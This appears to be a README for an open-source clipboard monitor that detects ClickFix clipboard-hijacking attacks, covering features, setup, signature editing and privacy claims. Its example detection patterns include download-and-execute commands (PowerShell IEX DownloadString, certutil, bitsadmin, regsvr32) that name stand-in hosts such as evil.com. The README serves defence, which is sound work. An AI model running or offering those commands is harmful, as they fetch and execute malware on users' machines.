Real-time protection against ClickFix attacks and malicious clipboard content
ClickFix is a dangerous social engineering attack that manipulates your clipboard to execute malicious code. When you copy what appears to be legitimate text (like a CAPTCHA solution or error fix), the website secretly replaces your clipboard content with harmful PowerShell scripts, batch commands, or other malicious code. When you paste and execute it, you unknowingly install malware on your system.
This tool provides real-time protection against such attacks.
- Continuously monitors your clipboard for changes
- Instant detection of malicious content
- Automatic threat analysis and alerts
- PowerShell attacks: Encoded commands, execution policy bypass, remote downloads
- CMD/Batch exploits: Certutil abuse, BITS jobs, regsvr32 tricks
- JavaScript injections: Eval functions, malicious scripts
- URL-based threats: Suspicious shortened links, malware download URLs
- Encoding attacks: Base64 payloads, hex-encoded malware
- Clean, intuitive GUI built with Tkinter
- Real-time clipboard content display
- Detailed threat analysis with explanations
- One-click malicious content removal
- JSON-based signature system
- Easy-to-edit detection patterns
- Add custom rules for emerging threats
- Import/export signature sets
- Comprehensive threat detection logs
- Timestamp and content tracking
- Export logs for security analysis
- Minimize to system tray for background protection
- Instant threat notifications
- Right-click menu for quick actions
- Silent monitoring mode
pip install pyperclippip install pystray Pillowpython clipboard_monitor.pypip install pyinstaller
pyinstaller --onefile --windowed clipboard_monitor.py- Launch the application
- Monitor - Tool automatically starts monitoring your clipboard
- Protection - Get instant alerts when malicious content is detected
- Action - Choose to clear dangerous content or review details
- Background - Minimize to tray for continuous protection
# Examples of detected patterns:
powershell.exe -encodedcommand [base64]
IEX (New-Object Net.WebClient).DownloadString('...')
Invoke-Expression $(...) # Examples of detected patterns:
certutil -urlcache -split -f http://malware.com/file.exe
bitsadmin /transfer /download http://evil.com/malware.exe
regsvr32 /s /n /u /i:http://malware.com/script.sct scrobj.dll- Shortened URLs (bit.ly, tinyurl.com, t.co)
- Direct executable downloads
- Suspicious domains and file extensions
Edit clipboard_signatures.json to add your own detection patterns:
{
"custom_patterns": [
"your_regex_pattern_here",
"another_suspicious_pattern"
]
}powershell_commands: PowerShell-based attackscmd_commands: Command prompt exploitsscript_patterns: JavaScript/VBScript injectionssuspicious_urls: Malicious or suspicious URLsencoding_patterns: Base64, hex, and other encoding attacks
β
100% Offline - No network connections or data transmission
β
Local Analysis - All threat detection happens on your machine
β
No Telemetry - Your clipboard content never leaves your computer
β
Open Source - Full transparency, audit the code yourself
β
Zero Dependencies - Core functionality works with Python standard library
*Clean, professional interface showing real-time clipboard monitoring and threat analysis*
Background protection with instant notifications when threats are detected
*Detailed analysis showing exactly what malicious patterns were found*
- Python: 3.6 or higher
- OS: Windows, macOS, or Linux
- RAM: ~50MB
- Dependencies:
pyperclip(clipboard access)pystray+Pillow(optional, for system tray)
We welcome contributions! Here's how you can help:
- Report Threats: Found a new ClickFix variant? Open an issue!
- Add Signatures: Submit new detection patterns via pull request
- Improve Code: Bug fixes, performance improvements, new features
- Documentation: Help improve docs and examples
# Format for new signature patterns
"new_threat_category": [
r"regex_pattern_for_detection",
r"another_pattern_variant"
]This project is licensed under the MIT License - see the LICENSE file for details.
This tool is designed to help protect against clipboard-based attacks but should be used as part of a comprehensive security strategy. Always keep your system updated and use reputable antivirus software alongside this tool.
- Inspired by research on ClickFix attack vectors
- Built to protect users from social engineering attacks
- Community-driven signature database
- Issues: Report bugs or request features via GitHub Issues
- Security: For security vulnerabilities, please email privately
- Updates: Watch this repository for the latest threat signatures
Stay Safe! π‘οΈ Your clipboard is more dangerous than you think.